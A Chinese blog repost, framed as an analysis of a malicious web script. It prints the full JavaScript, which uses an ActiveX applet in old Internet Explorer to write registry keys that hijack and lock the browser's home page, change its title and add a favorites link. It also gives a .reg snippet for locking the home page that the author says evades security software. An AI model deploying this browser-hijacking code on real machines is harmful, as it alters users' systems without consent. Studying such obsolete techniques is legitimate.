一段恶意脚本的分析及思考

简介:

这段代码主要实现了通过javascript修改注册表中的信息,不过现在所有杀软都已列入了黑名单,代码中的F935DC26-1CF0-11D0-ADB9-00C04FD58A0B 这个字符串在目前的电脑中已经不存在了,但是分析这段代码还有其它的收获,代码如下:

 

 
  1. <script>  
  2. document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");  
  3. function AddFavLnk(loc, DispName, SiteURL)  
  4. {  
  5. var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");  
  6. Shor.TargetPath = SiteURL;  
  7. Shor.Save();  
  8. }  
  9. function f(){  
  10. try 
  11. {  
  12. //ActiveX 初始化  
  13. a1=document.applets[0];  
  14. a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");  
  15. a1.createInstance();  
  16. Shl = a1.GetObject();  
  17. a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");  
  18. a1.createInstance();  
  19. FSO = a1.GetObject();  
  20. a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");  
  21. a1.createInstance();  
  22. Net = a1.GetObject();  
  23. try 
  24. {  
  25. if (document.cookie.indexOf("Chg") == -1)  
  26. {  
  27. //设置Cookie  
  28. var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));  
  29. document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
  30. //设置Cookie完毕  
  31. //设置主页  
  32. Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page""http://sucre.javaeye.com/");  
  33. //修改浏览器的标题  
  34. Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title""你的Internet Explorer已经被修改过了 By Sucre");  
  35. //锁定浏览器首页  
  36. Sh1.RegWrite("HKCR\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\shell\\OpenHomePage\\Command\\@","'\"C:\\Program Files\\Internet Explorer\\IExplore.exe\"' http://sucre.javaeye.com");  
  37. //设置Cookie  
  38. var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));  
  39. document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" 
  40. var WF, Shor, loc;  
  41. WF = FSO.GetSpecialFolder(0);  
  42. loc = WF + "\\Favorites";  
  43. if(!FSO.FolderExists(loc))  
  44. {  
  45. loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";  
  46. if(!FSO.FolderExists(loc))  
  47. {  
  48. return;  
  49. }  
  50. }  
  51. AddFavLnk(loc, "我的博客""http://sucre.blog.51cto.com");  
  52. }  
  53. }  
  54. catch(e)  
  55. {}  
  56. }  
  57. catch(e)  
  58. {}  
  59. }  
  60.  
  61.  
  62.  
  63. function init()  
  64. {  
  65. setTimeout("f()", 1000);  
  66. }  
  67. init();  
  68. </script> 

 其实,用其它脚本也可以实现锁定主页,比如批处理,下面这段代码就锁住了主页,一开IE就会显示指定的页面,这种指向方法所有的防护软件都不会报警,代码如下:

 
  1. Windows Registry Editor Version 5.00  
  2.  
  3. [HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]  
  4.  
  5. @="\"C:\\Program Files\\Internet Explorer\\IExplore.exe\" http://sucre.blog.51cto.com"  

 以上文字仅供学习交流,不要用于非法操作,否则后果自负!



本文转自sucre03 51CTO博客,原文链接:http://blog.51cto.com/sucre/380581,如需转载请自行联系原作者

相关文章
|
7天前
|
弹性计算 关系型数据库 微服务
基于 Docker 与 Kubernetes(K3s)的微服务:阿里云生产环境扩容实践
在微服务架构中,如何实现“稳定扩容”与“成本可控”是企业面临的核心挑战。本文结合 Python FastAPI 微服务实战,详解如何基于阿里云基础设施,利用 Docker 封装服务、K3s 实现容器编排,构建生产级微服务架构。内容涵盖容器构建、集群部署、自动扩缩容、可观测性等关键环节,适配阿里云资源特性与服务生态,助力企业打造低成本、高可靠、易扩展的微服务解决方案。
1165 3
|
6天前
|
机器学习/深度学习 人工智能 前端开发
通义DeepResearch全面开源!同步分享可落地的高阶Agent构建方法论
通义研究团队开源发布通义 DeepResearch —— 首个在性能上可与 OpenAI DeepResearch 相媲美、并在多项权威基准测试中取得领先表现的全开源 Web Agent。
841 12
|
16天前
|
人工智能 运维 安全
|
5天前
|
机器学习/深度学习 物联网
Wan2.2再次开源数字人:Animate-14B!一键实现电影角色替换和动作驱动
今天,通义万相的视频生成模型又又又开源了!Wan2.2系列模型家族新增数字人成员Wan2.2-Animate-14B。
428 10
|
7天前
|
弹性计算 Kubernetes jenkins
如何在 ECS/EKS 集群中有效使用 Jenkins
本文探讨了如何将 Jenkins 与 AWS ECS 和 EKS 集群集成,以构建高效、灵活且具备自动扩缩容能力的 CI/CD 流水线,提升软件交付效率并优化资源成本。
329 0
|
14天前
|
人工智能 异构计算
敬请锁定《C位面对面》,洞察通用计算如何在AI时代持续赋能企业创新,助力业务发展!
敬请锁定《C位面对面》,洞察通用计算如何在AI时代持续赋能企业创新,助力业务发展!